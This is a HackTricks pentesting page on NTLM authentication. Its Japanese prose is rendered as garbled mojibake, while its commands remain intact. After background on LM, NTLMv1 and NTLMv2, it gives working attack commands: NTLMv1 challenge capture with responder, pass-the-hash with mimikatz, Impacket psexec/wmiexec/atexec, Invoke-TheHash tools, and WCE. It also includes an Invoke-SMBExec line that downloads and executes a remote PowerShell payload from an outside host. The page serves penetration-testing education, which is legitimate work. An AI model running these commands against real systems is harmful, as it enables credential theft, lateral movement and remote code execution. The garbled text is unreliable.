21 KiB
NTLM
âïž HackTricks Cloud âïž -ðŠ Twitter ðŠ - ðïž Twitch ðïž - ð¥ Youtube ð¥
- ããªãã¯ãµã€ããŒã»ãã¥ãªãã£äŒç€Ÿã§åããŠããŸããïŒ HackTricksã§ããªãã®äŒç€Ÿã宣äŒãããã§ããïŒãŸãã¯ãPEASSã®ææ°ããŒãžã§ã³ã«ã¢ã¯ã»ã¹ããããHackTricksãPDFã§ããŠã³ããŒããããã§ããïŒSUBSCRIPTION PLANSããã§ãã¯ããŠãã ããïŒ
- The PEASS FamilyãèŠã€ããŠãã ãããç¬å çãªNFTã®ã³ã¬ã¯ã·ã§ã³ã§ãã
- å ¬åŒã®PEASSïŒHackTricks swagãæã«å ¥ããŸãããã
- ð¬ Discordã°ã«ãŒããŸãã¯telegramã°ã«ãŒãã«åå ããããTwitterã§ãã©ããŒããŠãã ããðŠ@carlospolopmã
- ãããã³ã°ã®ããªãã¯ãå ±æããããã«ãPRãæåºã㊠hacktricks repo ãš hacktricks-cloud repo ã«åå ããŠãã ããã
åºæ¬æ å ±
NTLMã®è³æ Œæ å ±: ãã¡ã€ã³åïŒããå ŽåïŒããŠãŒã¶ãŒåããã¹ã¯ãŒãããã·ã¥ã
LMã¯Windows XPãšãµãŒããŒ2003ã§ã®ã¿æå¹ã§ãïŒLMããã·ã¥ã¯ã¯ã©ãã¯ã§ããŸãïŒãLMããã·ã¥AAD3B435B51404EEAAD3B435B51404EEã¯ãLMã䜿çšãããŠããªãããšãæå³ããŸãïŒç©ºã®æååã®LMããã·ã¥ã§ãïŒã
ããã©ã«ãã§ã¯Kerberosã䜿çšããããããNTLMã¯Active Directoryãæ§æãããŠããªãããã¡ã€ã³ãååšããªããKerberosãæ©èœããŠããªãïŒæ§æãäžæ£ïŒããã¯ã©ã€ã¢ã³ããæå¹ãªãã¹ãåã®ä»£ããã«IPã䜿çšããŠæ¥ç¶ããããšããå Žåã«ã®ã¿äœ¿çšãããŸãã
NTLMèªèšŒã®ãããã¯ãŒã¯ãã±ããã«ã¯ããã㌠"NTLMSSP" ããããŸãã
ãããã³ã«ïŒLMãNTLMv1ãããã³NTLMv2ã¯ãDLL %windir%\Windows\System32\msv1_0.dllã§ãµããŒããããŠããŸãã
LMãNTLMv1ãããã³NTLMv2
䜿çšããããããã³ã«ã確èªããã³èšå®ã§ããŸãïŒ
GUI
_secpol.msc_ãå®è¡ -> ããŒã«ã«ããªã·ãŒ -> ã»ãã¥ãªãã£ãªãã·ã§ã³ -> ãããã¯ãŒã¯ã»ãã¥ãªãã£ïŒLANãããŒãžã£èªèšŒã¬ãã«ãã¬ãã«ã¯0ãã5ãŸã§ã®6ã€ãããŸãã
ã¬ãžã¹ããª
ããã«ãããã¬ãã«5ãèšå®ãããŸãïŒ
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ /v lmcompatibilitylevel /t REG_DWORD /d 5 /f
å¯èœãªå€ïŒ
0 - Send LM & NTLM responses
1 - Send LM & NTLM responses, use NTLMv2 session security if negotiated
2 - Send NTLM response only
3 - Send NTLMv2 response only
4 - Send NTLMv2 response only, refuse LM
5 - Send NTLMv2 response only, refuse LM & NTLM
åºæ¬çãªNTLMãã¡ã€ã³èªèšŒã¹ããŒã
- ãŠãŒã¶ãŒãè³æ Œæ å ±ãå ¥åããŸãã
- ã¯ã©ã€ã¢ã³ããã·ã³ã¯ããã¡ã€ã³åãšãŠãŒã¶ãŒåãéä¿¡ããŠèªèšŒèŠæ±ãéä¿¡ããŸãã
- ãµãŒããŒã¯ãã£ã¬ã³ãžãéä¿¡ããŸãã
- ã¯ã©ã€ã¢ã³ãã¯ããã¹ã¯ãŒãã®ããã·ã¥ãããŒãšããŠãã£ã¬ã³ãžãæå·åããå¿çãšããŠéä¿¡ããŸãã
- ãµãŒããŒã¯ããã¡ã€ã³åããŠãŒã¶ãŒåããã£ã¬ã³ãžãå¿çããã¡ã€ã³ã³ã³ãããŒã©ãŒã«éä¿¡ããŸããActive Directoryãæ§æãããŠããªãå Žåãããã¡ã€ã³åããµãŒããŒã®ååã§ããå Žåãè³æ Œæ å ±ã¯ããŒã«ã«ã§ç¢ºèªãããŸãã
- ãã¡ã€ã³ã³ã³ãããŒã©ãŒã¯ããã¹ãŠãæ£ãããã©ããã確èªããæ å ±ããµãŒããŒã«éä¿¡ããŸãã
ãµãŒããŒãšãã¡ã€ã³ã³ã³ãããŒã©ãŒã¯ãNetlogonãµãŒããŒãä»ããŠã»ãã¥ã¢ãã£ãã«ãäœæã§ããŸãããã¡ã€ã³ã³ã³ãããŒã©ãŒã¯ãµãŒããŒã®ãã¹ã¯ãŒããç¥ã£ãŠããããããããå¯èœã§ãïŒããã¯NTDS.DITããŒã¿ããŒã¹å ã«ãããŸãïŒã
ããŒã«ã«NTLMèªèšŒã¹ããŒã
èªèšŒã¯ã以åã«è¿°ã¹ããã®ãšåãã§ããããµãŒããŒã¯SAMãã¡ã€ã«å ã§èªèšŒããããšãããŠãŒã¶ãŒã®ããã·ã¥ãç¥ã£ãŠããŸãããããã£ãŠããã¡ã€ã³ã³ã³ãããŒã©ãŒã«åãåããã代ããã«ããµãŒããŒèªäœã§ãŠãŒã¶ãŒã®èªèšŒã確èªããŸãã
NTLMv1ãã£ã¬ã³ãž
ãã£ã¬ã³ãžã®é·ãã¯8ãã€ãã§ãå¿çã®é·ãã¯24ãã€ãã§ãã
ããã·ã¥NTïŒ16ãã€ãïŒã¯ã7ãã€ããã€3ã€ã®ããŒãïŒ7B + 7B +ïŒ2B + 0x00*5ïŒïŒã«åå²ãããŸãïŒæåŸã®ããŒãã¯ãŒãã§åããããŸãã次ã«ããã£ã¬ã³ãžã¯åããŒãããšã«å¥ã ã«æå·åãããçµæã®æå·åããããã€ããçµåãããŸããåèšïŒ8B + 8B + 8B = 24ãã€ãã
åé¡ç¹ïŒ
- ã©ã³ãã æ§ã®æ¬ åŠ
- 3ã€ã®ããŒãã¯åå¥ã«æ»æãããNTããã·ã¥ãèŠã€ããããšãã§ããŸã
- DESã¯è§£èªå¯èœ
- 3çªç®ã®ããŒã¯åžžã«5ã€ã®ãŒãã§æ§æãããŠããŸãã
- åããã£ã¬ã³ãžãäžãããããšãå¿çã¯åãã«ãªããŸãããããã£ãŠã被害è ã«æååã1122334455667788ãããã£ã¬ã³ãžãšããŠäžããäºåèšç®ãããã¬ã€ã³ããŒããŒãã«ã䜿çšããŠæ»æããããšãã§ããŸãã
NTLMv1æ»æ
çŸåšã§ã¯ãUnconstrained Delegationãæ§æãããç°å¢ã¯å°ãªããªã£ãŠããŠããŸãããããã¯æ§æãããããªã³ãã¹ããŒã©ãŒãµãŒãã¹ãæªçšããããšãã§ããªãããšãæå³ããŸããã
æ¢ã«ADã§æã£ãŠããããã€ãã®è³æ Œæ
å ±/ã»ãã·ã§ã³ã䜿çšããŠãããªã³ã¿ãŒã«å¯ŸããŠã³ã³ãããŒã«äžã®ãã¹ãã«å¯ŸããŠèªèšŒãèŠæ±ããããšãã§ããŸãããã®åŸãmetasploit auxiliary/server/capture/smb
ãŸãã¯responder
ã䜿çšããŠãèªèšŒãã£ã¬ã³ãžã1122334455667788ã«èšå®ããèªèšŒè©Šè¡ããã£ããã£ãããããNTLMv1ã䜿çšããŠè¡ãããå Žåããããã¯ã©ãã¯ããããšãã§ããŸãã
responder
ã䜿çšããŠããå Žåã¯ãèªèšŒãããŠã³ã°ã¬ãŒãããããã«ãã©ã°--lm
ã䜿çšããŠã¿ãããšãã§ããŸãã
ãã®ãã¯ããã¯ã§ã¯ãèªèšŒã¯NTLMv1ã䜿çšããŠå®è¡ããå¿
èŠããããŸãïŒNTLMv2ã¯æå¹ã§ã¯ãããŸããïŒã
ããªã³ã¿ãŒã¯èªèšŒäžã«ã³ã³ãã¥ãŒã¿ãŒã¢ã«ãŠã³ãã䜿çšããã³ã³ãã¥ãŒã¿ãŒã¢ã«ãŠã³ãã¯é·ãã©ã³ãã ãªãã¹ã¯ãŒãã䜿çšãããããäžè¬çãªèŸæžã䜿çšããŠã¯ã©ãã¯ããããšã¯ããããã§ããŸãããããããNTLMv1èªèšŒã¯DESã䜿çšããŠããŸãïŒè©³çŽ°ã¯ãã¡ãïŒããããã£ãŠãDESãã¯ã©ãã¯ããããã«ç¹ã«å°çšã®ãµãŒãã¹ã䜿çšããããšã§ããããã¯ã©ãã¯ããããšãã§ããŸãïŒããšãã°ãhttps://crack.sh/ã䜿çšã§ããŸãïŒã
NTLMv2ãã£ã¬ã³ãž
ãã£ã¬ã³ãžã®é·ãã¯8ãã€ãã§ã2ã€ã®å¿çãéä¿¡ãããŸãïŒ1ã€ã¯24ãã€ãã§ããã1ã€ã¯å¯å€é·ã§ãã
æåã®å¿çã¯ãã¯ã©ã€ã¢ã³ããšãã¡ã€ã³ãããªãæååãHMAC_MD5ã§æå·åããNTããã·ã¥ã®ããã·ã¥MD4ãããŒãšããŠäœ¿çšããŸãã次ã«ãçµæã¯ãã£ã¬ã³ãžãæå·åããããã®ããŒãšããŠäœ¿çšãããŸããããã«ã¯ã8ãã€ãã®ã¯ã©ã€ã¢ã³ããã£ã¬ã³ãžãè¿œå ãããŸããåèšïŒ24 Bã
2çªç®ã®å¿çã¯ãããã€ãã®å€ïŒæ°ããã¯ã©ã€ã¢ã³ããã£ã¬ã³ãžããªãã¬ã€æ»æãé²ãããã®ã¿ã€ã ã¹ã¿ã³ããªã©ïŒã䜿çšããŠäœæãããŸãã
æåããèªèšŒããã»ã¹ããã£ããã£ããpcapãããå Žåããã®ã¬ã€ãã«åŸã£ãŠãã¡ã€ã³ããŠãŒã¶ãŒåããã£ã¬ã³ãžãå¿çãååŸãããã¹ã¯ãŒããã¯ã©ãã¯ããããšããããšãã§ããŸãïŒhttps://research.801labs.org/cracking-an-ntlmv2-hash/
ãã¹ã»ã¶ã»ããã·ã¥
被害è
ã®ããã·ã¥ãæã£ãŠããå Žåãããã䜿çšããŠè¢«å®³è
ã«ãªããŸãã
ãã®ããã·ã¥ã䜿çšããŠNTLMèªèšŒãå®è¡ããããŒã«ã䜿çšããå¿
èŠããããŸãããŸãã¯ãæ°ããã»ãã·ã§ã³ãã°ãªã³ãäœæãããã®ããã·ã¥ãLSASSã«æ³šå
¥ããããšãã§ããŸãããã®ããã**NTLMèªèšŒãå®è¡ããããšããã®ããã·ã¥ã䜿çšãããŸãã**æåŸã®ãªãã·ã§ã³ãmimikatzãè¡ãããšã§ãã
ãã¹ã»ã¶ã»ããã·ã¥æ»æã¯ã³ã³ãã¥ãŒã¿ãŒã¢ã«ãŠã³ãã䜿çšããŠãå®è¡ã§ããããšã«æ³šæããŠãã ããã
Mimikatz
管çè ãšããŠå®è¡ããå¿ èŠããããŸãã
Invoke-Mimikatz -Command '"sekurlsa::pth /user:username /domain:domain.tld /ntlm:NTLMhash /run:powershell.exe"'
ããã«ãããmimikatzãèµ·åãããŠãŒã¶ãŒã«å±ããããã»ã¹ãéå§ãããŸãããLSASSå
éšã§ã¯mimikatzãã©ã¡ãŒã¿å
ã®ä¿åãããè³æ Œæ
å ±ã䜿çšãããŸãããã®åŸããã®ãŠãŒã¶ãŒãšããŠãããã¯ãŒã¯ãªãœãŒã¹ã«ã¢ã¯ã»ã¹ã§ããŸãïŒrunas /netonly
ããªãã¯ãšäŒŒãŠããŸãããå¹³æãã¹ã¯ãŒããç¥ãå¿
èŠã¯ãããŸããïŒã
Linuxããã®ããã·ã¥ã®æž¡ã
LinuxããPass-the-Hashã䜿çšããŠWindowsãã·ã³ã§ã³ãŒãå®è¡ãååŸããããšãã§ããŸãã
ãããã¯ãªãã¯ããŠæ¹æ³ãåŠã³ãŸãããã
Impacket Windowsã³ã³ãã€ã«æžã¿ããŒã«
Windowsçšã®impacketãã€ããªã¯ãã¡ãããããŠã³ããŒãã§ããŸãã
- psexec_windows.exe
C:\AD\MyTools\psexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.my.domain.local
- wmiexec.exe
wmiexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.dollarcorp.moneycorp.local
- atexec.exeïŒãã®å Žåãã³ãã³ããæå®ããå¿
èŠããããŸããcmd.exeãpowershell.exeã¯å¯Ÿè©±åã·ã§ã«ãååŸããããã«ã¯ç¡å¹ã§ãïŒ
C:\AD\MyTools\atexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.dollarcorp.moneycorp.local 'whoami'
- ä»ã«ãããã€ãã®Impacketãã€ããªããããŸã...
Invoke-TheHash
PowerShellã¹ã¯ãªããã¯ãã¡ãããå ¥æã§ããŸãïŒhttps://github.com/Kevin-Robertson/Invoke-TheHash
Invoke-SMBExec
Invoke-SMBExec -Target dcorp-mgmt.my.domain.local -Domain my.domain.local -Username username -Hash b38ff50264b74508085d82c69794a4d8 -Command 'powershell -ep bypass -Command "iex(iwr http://172.16.100.114:8080/pc.ps1 -UseBasicParsing)"' -verbose
Invoke-WMIExec
Invoke-WMIExec
ã¯ãWindowsãã·ã³äžã§WMIïŒWindows Management InstrumentationïŒã䜿çšããŠãªã¢ãŒãã³ãŒãå®è¡ãè¡ãããã®PowerShellã¹ã¯ãªããã§ãã
ãã®ã¹ã¯ãªããã¯ãWMIãä»ããŠãªã¢ãŒããã·ã³ã«æ¥ç¶ããæå®ããã³ãã³ããå®è¡ããããšãã§ããŸããããã«ããããªã¢ãŒããã·ã³äžã§æš©éææ Œãæ å ±åéãªã©ã®ã¿ã¹ã¯ãå®è¡ããããšãã§ããŸãã
䜿çšæ¹æ³ã¯ä»¥äžã®éãã§ãã
Invoke-WMIExec -Target <TargetIP> -Username <Username> -Password <Password> -Command <Command>
<TargetIP>
: ã¿ãŒã²ãããã·ã³ã®IPã¢ãã¬ã¹<Username>
: WMIæ¥ç¶ã«äœ¿çšãããŠãŒã¶ãŒå<Password>
: WMIæ¥ç¶ã«äœ¿çšãããã¹ã¯ãŒã<Command>
: å®è¡ããã³ãã³ã
ãã®ã¹ã¯ãªããã¯ãWMIãä»ããŠãªã¢ãŒããã·ã³ã«æ¥ç¶ãããããã¿ãŒã²ãããã·ã³ã§WMIãæå¹ã«ãªã£ãŠããå¿ èŠããããŸãããŸããé©åãªæš©éãæã€ãŠãŒã¶ãŒåãšãã¹ã¯ãŒããæå®ããå¿ èŠããããŸãã
Invoke-WMIExec
ã¯ããããã¬ãŒã·ã§ã³ãã¹ããã»ãã¥ãªãã£ãªãŒãã£ãããªã©ã®ç®çã§äœ¿çšãããããšããããŸãããæªæã®ããç®çã§äœ¿çšããããšã¯éæ³ã§ããåžžã«æ³åŸãšå«çã«åŸã£ãŠè¡åããŠãã ããã
Invoke-SMBExec -Target dcorp-mgmt.my.domain.local -Domain my.domain.local -Username username -Hash b38ff50264b74508085d82c69794a4d8 -Command 'powershell -ep bypass -Command "iex(iwr http://172.16.100.114:8080/pc.ps1 -UseBasicParsing)"' -verbose
Invoke-SMBClient
Invoke-SMBClient
ã¯ãWindowsã·ã¹ãã ã§SMBïŒServer Message BlockïŒãããã³ã«ã䜿çšããŠãªã¢ãŒããµãŒããŒã«æ¥ç¶ããããã®PowerShellã¹ã¯ãªããã§ãããã®ã¹ã¯ãªããã¯ãSMBãä»ããŠãã¡ã€ã«ã®éåä¿¡ããªã¢ãŒãã³ãã³ãã®å®è¡ãªã©ãããŸããŸãªæäœãå®è¡ããããšãã§ããŸãã
䜿çšæ³
以äžã¯ãInvoke-SMBClient
ã¹ã¯ãªããã®åºæ¬çãªäœ¿çšæ³ã§ãã
Invoke-SMBClient -Target <target> -Username <username> -Password <password> -Command <command>
<target>
: æ¥ç¶å ã®ãªã¢ãŒããµãŒããŒã®IPã¢ãã¬ã¹ãŸãã¯ãã¹ãåãæå®ããŸãã<username>
: ãªã¢ãŒããµãŒããŒãžã®æ¥ç¶ã«äœ¿çšãããŠãŒã¶ãŒåãæå®ããŸãã<password>
: ãŠãŒã¶ãŒã®ãã¹ã¯ãŒããæå®ããŸãã<command>
: å®è¡ãããªã¢ãŒãã³ãã³ããæå®ããŸãã
äŸ
以äžã¯ãInvoke-SMBClient
ã¹ã¯ãªããã®äœ¿çšäŸã§ãã
Invoke-SMBClient -Target 192.168.1.100 -Username admin -Password P@ssw0rd -Command "dir C:\"
ãã®äŸã§ã¯ã192.168.1.100ãšããIPã¢ãã¬ã¹ã®ãªã¢ãŒããµãŒããŒã«ãadminãšãããŠãŒã¶ãŒåãšP@ssw0rdãšãããã¹ã¯ãŒãã§æ¥ç¶ããdir C:\
ã³ãã³ããå®è¡ããŠããŸãã
泚æäºé
Invoke-SMBClient
ã¹ã¯ãªããã䜿çšããéã«ã¯ãé©åãªæš©éãæã€ãŠãŒã¶ãŒåãšãã¹ã¯ãŒãã䜿çšããããšããå§ãããŸãããŸãããªã¢ãŒããµãŒããŒãžã®ã¢ã¯ã»ã¹æš©éãæã£ãŠããããšã確èªããŠãã ããã
Invoke-SMBClient -Domain dollarcorp.moneycorp.local -Username svcadmin -Hash b38ff50264b74508085d82c69794a4d8 [-Action Recurse] -Source \\dcorp-mgmt.my.domain.local\C$\ -verbose
Invoke-SMBEnum
Invoke-SMBEnumã¯ãWindowsã·ã¹ãã ã§SMBïŒServer Message BlockïŒãããã³ã«ã䜿çšããŠãããã¯ãŒã¯å ±æãåæããããã®PowerShellã¹ã¯ãªããã§ãããã®ã¹ã¯ãªããã¯ããããã¯ãŒã¯äžã®ãã¹ãã«å¯ŸããŠSMBããŒãžã§ã³ã®ã¹ãã£ã³ãå®è¡ããå ±æãã©ã«ãããŠãŒã¶ãŒãã°ã«ãŒããã»ãã¥ãªãã£ããªã·ãŒãªã©ã®æ å ±ãåéããŸãã
ãã®ã¹ã¯ãªããã䜿çšãããšããããã¯ãŒã¯å ã®æœåšçãªã»ãã¥ãªãã£ãªã¹ã¯ãç¹å®ããããšãã§ããŸããäŸãã°ãããã©ã«ãã®å ±æãã©ã«ããäžé©åãªã¢ã¯ã»ã¹èšå®ãããå Žåãæªæã®ãããŠãŒã¶ãŒãæ©å¯æ å ±ã«ã¢ã¯ã»ã¹ããå¯èœæ§ããããŸãã
Invoke-SMBEnumã¯ã以äžã®ãããªãªãã·ã§ã³ã䜿çšããŠå®è¡ã§ããŸãïŒ
-Target
: ã¹ãã£ã³å¯Ÿè±¡ã®ãã¹ãã®IPã¢ãã¬ã¹ãŸãã¯ãã¹ãåãæå®ããŸãã-Port
: ã¹ãã£ã³ããããŒãçªå·ãæå®ããŸããããã©ã«ãã¯445ã§ãã-Threads
: åæã«å®è¡ããã¹ã¬ããæ°ãæå®ããŸããããã©ã«ãã¯10ã§ãã-OutputFile
: çµæãä¿åãããã¡ã€ã«ã®ãã¹ãæå®ããŸãã
以äžã¯ãInvoke-SMBEnumã®äœ¿çšäŸã§ãïŒ
Invoke-SMBEnum -Target 192.168.1.100 -Port 445 -Threads 20 -OutputFile C:\smb_enum_results.txt
ãã®ã³ãã³ãã¯ã192.168.1.100ãšããIPã¢ãã¬ã¹ã®ãã¹ãã«å¯ŸããŠãããŒãçªå·445ã§ã¹ãã£ã³ãå®è¡ãã20ã®ã¹ã¬ããã䜿çšããŠçµæãC:\smb_enum_results.txtã«ä¿åããŸãã
Invoke-SMBEnumã¯ããããã¯ãŒã¯å ±æã®ã»ãã¥ãªãã£è©äŸ¡ããããã¬ãŒã·ã§ã³ãã¹ãã«ãããŠéåžžã«æçšãªããŒã«ã§ãããã ããæš©éãæããªããããã¯ãŒã¯ã«å¯ŸããŠå®è¡ããå Žåã¯ãæ³çãªå¶çŽãèš±å¯ã確èªããå¿ èŠããããŸãã
Invoke-SMBEnum -Domain dollarcorp.moneycorp.local -Username svcadmin -Hash b38ff50264b74508085d82c69794a4d8 -Target dcorp-mgmt.dollarcorp.moneycorp.local -verbose
Invoke-TheHash
ãã®é¢æ°ã¯ãä»ã®ãã¹ãŠã®é¢æ°ãçµã¿åããããã®ã§ããè€æ°ã®ãã¹ããæž¡ãããšãã§ããç¹å®ã®ãã¹ããé€å€ããããšãã§ããŸãã䜿çšãããªãã·ã§ã³ïŒSMBExecãWMIExecãSMBClientãSMBEnumïŒãéžæããããšãã§ããŸããSMBExecãšWMIExecã®ãããããéžæãããã ãCommandãã©ã¡ãŒã¿ãæå®ããªãå Žåãååãªæš©éããããã©ããããã§ãã¯ããã ãã§ãã
Invoke-TheHash -Type WMIExec -Target 192.168.100.0/24 -TargetExclude 192.168.100.50 -Username Administ -ty h F6F38B793DB6A94BA04A52F1D3EE92F0
Evil-WinRM ãã¹ã»ã¶ã»ããã·ã¥
Windows Credentials Editor (WCE)
管çè ãšããŠå®è¡ããå¿ èŠããããŸã
ãã®ããŒã«ã¯ãmimikatzãšåãããšãè¡ããŸãïŒLSASSã¡ã¢ãªã®å€æŽïŒã
wce.exe -s <username>:<domain>:<hash_lm>:<hash_nt>
ãŠãŒã¶ãŒåãšãã¹ã¯ãŒãã䜿çšããWindowsãªã¢ãŒãå®è¡ã®æåæ¹æ³
ãã¡ãã®ããŒãžã§ãWindowsãã¹ãããè³æ Œæ å ±ãååŸããæ¹æ³ã«ã€ããŠè©³çŽ°ã確èªã§ããŸãã
Windowsãã¹ãããã®è³æ Œæ å ±ã®æœåº
Windowsãã¹ãããè³æ Œæ å ±ãååŸããæ¹æ³ã«ã€ããŠã®è©³çŽ°ã¯ããã¡ãã®ããŒãžãåç §ããŠãã ããã
NTLMãªã¬ãŒãšã¬ã¹ãã³ããŒ
ãããã®æ»æãå®è¡ããæ¹æ³ã«ã€ããŠã®è©³çŽ°ãªã¬ã€ãã¯ããã¡ããåç §ããŠãã ããã
ãããã¯ãŒã¯ãã£ããã£ããã®NTLMãã£ã¬ã³ãžã®è§£æ
https://github.com/mlgualtieri/NTLMRawUnHideã䜿çšããããšãã§ããŸãã
âïž HackTricks Cloud âïž -ðŠ Twitter ðŠ - ðïž Twitch ðïž - ð¥ Youtube ð¥
- ãµã€ããŒã»ãã¥ãªãã£äŒæ¥ã§åããŠããŸããïŒ HackTricksã§äŒç€Ÿã宣äŒãããã§ããïŒãŸãã¯ãPEASSã®ææ°ããŒãžã§ã³ã«ã¢ã¯ã»ã¹ããããHackTricksãPDFã§ããŠã³ããŒããããã§ããïŒSUBSCRIPTION PLANSããã§ãã¯ããŠãã ããïŒ
- The PEASS Familyãã芧ãã ãããç¬å çãªNFTã®ã³ã¬ã¯ã·ã§ã³ã§ãã
- å ¬åŒã®PEASSïŒHackTricksã°ããºãæã«å ¥ããŸãããã
- ð¬ Discordã°ã«ãŒããŸãã¯Telegramã°ã«ãŒãã«åå ããããTwitterã§ðŠ@carlospolopmããã©ããŒããŠãã ããã
- ãããã³ã°ã®ããªãã¯ãå ±æããã«ã¯ãhacktricks repo ãš hacktricks-cloud repo ã«PRãæåºããŠãã ããã